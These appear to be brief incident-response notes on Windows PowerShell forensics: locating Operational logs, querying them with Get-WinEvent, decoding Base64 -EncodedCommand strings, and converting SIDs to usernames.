1. Where are PowerShell logs stored?
- Event Viewer > Applications and Services Logs > Microsoft > Windows > PowerShell > Operational
2. How to view Powershell logs via CLI
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" -MaxEvents 10 | Format-List
3. Decoding Base64 Encoded PowerShell Payloads
- Attackers often hide commands using -EncodedCommand
- Decode it like this:
[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String("aQBlAHgA..."))
4. Who Executed the Command? (SID -> Username)
- In logs, the UserID is shown as a SID (Security Identifier).
- To convert it into a username:
$sid = New-Object System.Security.Principal.SecurityIdentifier("S-1-5-21-...")
$user = $sid.Translate([System.Security.Principal.NTAccount])
$user.Value
